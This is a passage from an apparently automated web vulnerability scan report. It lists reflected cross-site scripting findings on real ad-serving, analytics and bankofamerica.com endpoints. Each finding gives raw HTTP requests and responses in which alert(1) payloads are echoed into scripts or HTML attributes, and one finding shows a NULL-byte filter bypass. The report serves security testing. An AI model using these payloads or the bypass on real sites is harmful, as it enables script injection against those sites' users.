Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:12:07 GMT
Expires: Tue Jun 28 02:12:07 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=680E78D3C7D024A38068748BBF0606FA; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227127460 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
click%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D3ed8a'-alert(1)-'fa896af9ac2&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%
...[SNIP]...

1.400. http://www.tumri.net/ads/mts/6565 [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89dd0'-alert(1)-'15f0173d708 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT89dd0'-alert(1)-'15f0173d708&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:13:58 GMT
Expires: Tue Jun 28 02:13:58 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77CF78365E61C8925EB015D00C6927DA; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227238890 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT89dd0'-alert(1)-'15f0173d708&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227238890.flashVersion + '">
...[SNIP]...

1.401. http://www.tumri.net/ads/mts/6565 [x2_TC_1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the x2_TC_1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 224ad'-alert(1)-'25d89c2988b was submitted in the x2_TC_1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575224ad'-alert(1)-'25d89c2988b HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:15:37 GMT
Expires: Tue Jun 28 02:15:38 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B710A7A17328E5BF820918A389E54A79; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227338174 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575224ad'-alert(1)-'25d89c2988b&nf=' + NS_1309227338174.flashVersion + '">
...[SNIP]...

1.402. http://www.tumri.net/ads/mts/6565 [zp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6565

Issue detail

The value of the zp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51620'-alert(1)-'f7d8157efcb was submitted in the zp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6565?DFA_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/b4/%2a/w%3B238933302%3B7-0%3B0%3B61840000%3B4307-300/250%3B41496877/41514664/1%3Bu%3D17474528%3B%7Efdr%3D234368221%3B0-0%3B0%3B58255351%3B4307-300/250%3B41422311/41440098/1%3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=||&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=0567251620'-alert(1)-'f7d8157efcb&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html
Date: Tue, 28 Jun 2011 02:14:27 GMT
Expires: Tue Jun 28 02:14:28 UTC 2011
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C8E0D420521EC4970A7BE8ED1698FC89; Path=/ads
Content-Length: 2719
Connection: keep-alive


var NS_1309227268251 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
7473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=0567251620'-alert(1)-'f7d8157efcb&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=' + NS_1309227268251.flashVersion + '">
...[SNIP]...

1.403. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d40dd<script>alert(1)</script>2d3473ffb1a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?callback=load_ad_callback&api_key=18d8c7d8c4d04d1588a9cf479a85164e HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: d40dd<script>alert(1)</script>2d3473ffb1a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=nfKE0o2gVAWW2gKtc9p719Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe32hAXyKQv5slExkNK7HUtFp4B4dlWpgdiiii7oa2yMBisxT8l3ZY0x5384cO8CXT3w9WGnfYj6EmHipAu1mGwE1mTRK5B29oiiex3ln3hiiYfpCN1xpl7n8isOcF9isuZCR3CvquVTGOVyTMzMOTpepJUdgwuhwxSOTisbiiey1NPJYa17G7HbipadhJoeOBujFAjpj8yhiptFALUYSbU9MSWJyvpiiNuqjH89PaO82isMBbrP3JUYHwJgHescjFAyxuBiswipz7gIrGD16MVPGT8txMaODe9cOOkiim9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqmtUGVbyBQ98YAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie; BizoNetworkPartnerIndex=15

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 28 Jun 2011 01:23:31 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: d40dd<script>alert(1)</script>2d3473ffb1a

1.404. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8562"-alert(1)-"ee4b9a4568a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=178169&siteID=N884.InvestingChannel&creativeID=41684033&placementID=62633688 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: a8562"-alert(1)-"ee4b9a4568a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 603
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAI2685=FTF; domain=.insightexpressai.com; expires=Tue, 28-Jun-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Tue, 28 Jun 2011 07:00:43 GMT
Pragma: no-cache
Date: Tue, 28 Jun 2011 07:00:43 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='function'
...[SNIP]...
InviteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=a8562"-alert(1)-"ee4b9a4568a&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033";document.getElementsByTagName('head')[0].appendChild(s);}})();

1.405. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009bcf8"-alert(1)-"88a80403e79 was submitted in the Referer HTTP header. This input was echoed as 9bcf8"-alert(1)-"88a80403e79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adServer/adServerESI.aspx?bannerID=178169&siteID=N884.InvestingChannel&creativeID=41684033&placementID=62633688 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: %009bcf8"-alert(1)-"88a80403e79
Cookie: DW=30a71fe21309244435; IXAI2685=FTF
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 606
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAI2685=FTF; domain=.insightexpressai.com; expires=Tue, 28-Jun-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Tue, 28 Jun 2011 07:34:46 GMT
Pragma: no-cache
Date: Tue, 28 Jun 2011 07:34:46 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='function'
...[SNIP]...
iteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=%009bcf8"-alert(1)-"88a80403e79&siteID=N884.InvestingChannel&placementID=62633688&creativeID=41684033";document.getElementsByTagName('head')[0].appendChild(s);}})();

1.406. https://my.scoutanalytics.com/ptmrg/authenticate.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://my.scoutanalytics.com
Path:   /ptmrg/authenticate.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9507a'-alert(1)-'f8d0e878aa5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptmrg/authenticate.aspx HTTP/1.1
Host: my.scoutanalytics.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9507a'-alert(1)-'f8d0e878aa5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lz2lakoqp3wumiuuir4ic3lk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: NRV2
Date: Tue, 28 Jun 2011 01:31:24 GMT
Content-Length: 4991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>

</
...[SNIP]...
q=0.7,*;q=0.3|Accept-Encoding=gzip,deflate,sdch|Accept-Language=en-US,en;q=0.8|Cookie=ASP.NET_SessionId=lz2lakoqp3wumiuuir4ic3lk|Host=my.scoutanalytics.com|Referer=http://www.google.com/search?hl=en&q=9507a'-alert(1)-'f8d0e878aa5;');$AOC.addEvent(window, "load", $AOB.asyncPopulateClientBrowserData);//]]>
...[SNIP]...

1.407. http://www.bankofamerica.com/surveys/popup_visit.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/popup_visit.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb107"><script>alert(1)</script>9819048f992 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /surveys/popup_visit.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb107"><script>alert(1)</script>9819048f992

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:18 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com
Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1447474859.20480.0000; path=/

<HTML>
<HEAD>
<TITLE>An Error Has Occurred</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF">

<FORM ACTION="/cferror.cgi" METHOD=POST>

<SCRIPT LA
...[SNIP]...
<INPUT TYPE="hidden" NAME="HTTPRefer" VALUE="http://www.google.com/search?hl=en&q=fb107"><script>alert(1)</script>9819048f992">
...[SNIP]...

1.408. http://www.bankofamerica.com/surveys/popup_visit.cfm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /surveys/popup_visit.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fbc"><script>alert(1)</script>c3248b5f21d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /surveys/popup_visit.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8fbc"><script>alert(1)</script>c3248b5f21d
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:35:17 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com
Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

<HTML>
<HEAD>
<TITLE>An Error Has Occurred</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF">

<FORM ACTION="/cferror.cgi" METHOD=POST>

<SCRIPT LA
...[SNIP]...
<INPUT TYPE="hidden" NAME="Browser" VALUE="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8fbc"><script>alert(1)</script>c3248b5f21d">
...[SNIP]...

